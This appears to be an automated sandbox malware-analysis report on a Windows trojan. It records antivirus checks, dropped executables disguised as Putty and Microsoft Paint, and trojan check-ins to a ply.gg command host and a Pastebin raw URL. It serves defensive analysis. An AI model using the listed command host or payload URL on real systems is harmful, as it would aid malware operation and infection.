Source: C:\Users\user\xdwdPutty.exe	Queries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exe	Queries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: ptKNiAaGus.exe, 00000000.00000002.3315461823.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1175503015.0000000001490000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1198001960.000000001C007000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3315892006.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3346481631.000000001B90E000.00000004.00000020.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1174194771.000000000135C000.00000004.00000020.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1190784165.000000001BD6A000.00000004.00000020.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1191163974.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1258532267.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1286934423.0000000000F6C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
147.185.221.18	q-policies.gl.at.ply.gg	United States	12087	SALSGIVERUS	true

Contacted Domains

Name	IP	Active
q-policies.gl.at.ply.gg	147.185.221.18	true
pastebin.com	104.20.3.235	true
icanhazip.com	104.16.185.241	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/LmbvnzZM	false	Avira URL Cloud: safe	unknown
http://icanhazip.com/	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe	Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: C:\Users\user\xdwdPutty.exe	Avira: detection malicious, Label: TR/Crypt.OPACK.Gen

Multi AV Scanner detection for submitted file

Source: ptKNiAaGus.exe

ReversingLabs: Detection: 83%

Machine Learning detection for dropped file

Source: C:\Users\user\Videos\xdwdPutty.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ptKNiAaGus.exe

Joe Sandbox ML: detected

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0

Source: ptKNiAaGus.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49740 -> 147.185.221.18:44998
Source: Traffic	Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49741 -> 147.185.221.18:44998
Source: Traffic	Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49745 -> 147.185.221.18:44998

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.11.20:49735 -> 147.185.221.18:44998

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.16.185.241 104.16.185.241
Source: Joe Sandbox View	IP Address: 147.185.221.18 147.185.221.18

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

May check the online IP address of the machine

Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: q-policies.gl.at.ply.gg
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com

Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.000000000292B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.000000000276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1199190845.000000001C0A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm=C:
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadi
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.c
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.co
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/r
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/ra
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/L
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lm
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmb
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmbv
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmbvn
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmbvnz
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/LmbvnzZ
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/LmbvnzZM

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Too many similar processes found

Source: cmd.exe

Process created: 46

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	File dump: xdwdPutty.exe.0.dr 740754944			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	File dump: xdwdMicrosoft PowerPoint Host.exe.19.dr 739685376			Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Code function: 0_2_00007FFF60F60F3F NtProtectVirtualMemory,

0_2_00007FFF60F60F3F

Creates files inside the system directory

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Windows\xdwd.dll

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F5B8C0	0_2_00007FFF60F5B8C0
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F663B6	0_2_00007FFF60F663B6
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F5C012	0_2_00007FFF60F5C012
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F5CE70	0_2_00007FFF60F5CE70
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5996B	17_2_00007FFF60F5996B
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5B8C0	17_2_00007FFF60F5B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5CB20	17_2_00007FFF60F5CB20
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5C012	17_2_00007FFF60F5C012
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F74520	19_2_00007FFF60F74520
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F620D0	19_2_00007FFF60F620D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F69369	19_2_00007FFF60F69369
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F615C8	19_2_00007FFF60F615C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F6A438	19_2_00007FFF60F6A438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F6B862	19_2_00007FFF60F6B862
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F613F9	19_2_00007FFF60F613F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F421D9	33_2_00007FFF60F421D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F4E470	33_2_00007FFF60F4E470
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F4DC85	33_2_00007FFF60F4DC85
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F49369	33_2_00007FFF60F49369
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F41320	33_2_00007FFF60F41320
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4996B	36_2_00007FFF60F4996B
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4B875	36_2_00007FFF60F4B875
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4CB29	36_2_00007FFF60F4CB29
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4C012	36_2_00007FFF60F4C012
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F2B8C0	50_2_00007FFF60F2B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F2C012	50_2_00007FFF60F2C012
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F29818	50_2_00007FFF60F29818
Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F5CB29	55_2_00007FFF60F5CB29
